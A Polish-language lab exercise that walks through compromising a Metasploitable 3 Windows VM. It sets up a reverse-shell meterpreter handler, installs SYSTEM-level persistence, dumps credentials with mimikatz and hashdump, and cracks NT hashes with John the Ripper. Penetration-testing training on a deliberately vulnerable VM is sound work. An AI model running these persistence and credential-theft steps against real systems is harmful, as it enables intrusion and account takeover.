Środowisko:

- Kali Linux
- Metasploitable 3 VM Win2k8

0. Zweryfikuj otwarte usługi

```
nmap -sS -sV 192.168.56.11 -oX tcp_only_192_168_56_11.xml

searchsploit --nmap tcp_only_192_168_56_11.xml -w

```

1. Uzyskaj dostęp do serwera za pomocą wybranej podatności 

2. Zweryfikuj uprawnienia użytkownika 

```
getuid

```

3. Sprawdź wersje systemu

```
getsystem
sysinfo

```

4. Zweryfikuj na jaka usługa działa na porcie 8585

```

netstat -tulnp

```

5. Utwórz persystencje

5.1. Przygotowanie handler`ów do obsłużenia połączenia

```
use multi/handler
msf6 exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.56.5     yes       The listen address (an interface may be specified)
   LPORT     5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > run -j

msf6 exploit(multi/handler) > jobs 

Jobs
====

  Id  Name                    Payload                          Payload opts
  --  ----                    -------                          ------------
  1   Exploit: multi/handler  windows/x64/meterpreter/reverse_tcp  tcp://192.168.56.5:5555


```

5.2 Z poprzedniego cwiczenia 16 wykorzystaj plik "meterpreter.exe" a nastepnie przenies go na serwer

```
use post/windows/manage/persistence_exe

msf6 post(windows/manage/persistence_exe) > show options 

Module options (post/windows/manage/persistence_exe):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   REXENAME  default.exe      yes       The name to call exe on remote system
   REXEPATH  meterpreter.exe      yes       The remote executable to upload and execute.
   RUN_NOW   true             no        Run the installed payload immediately.
   SESSION   10               yes       The session to run this module on
   STARTUP   SYSTEM           yes       Startup type for the persistent payload. (Accepted: USER, SYSTEM, SERVICE, TASK)

msf6 post(windows/manage/persistence_exe) > 

```

6. Sprawdź jakie hasło ma użytkownik "sshd_server"

```
meterpreter > load kiwi 
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > 

meterpreter > creds_all


```

7. Zrób dump hash`y użytkowników

```
meterpreter > hashdump

```

8. Złam hasła za pomocą narzędzia john the ripper. Jakie jest hasło dla użytkownika "c_three_pio"?

```
john hashes.txt --format=NT

```


9. polacz sie do hosta za pomoca tego uzytkownika
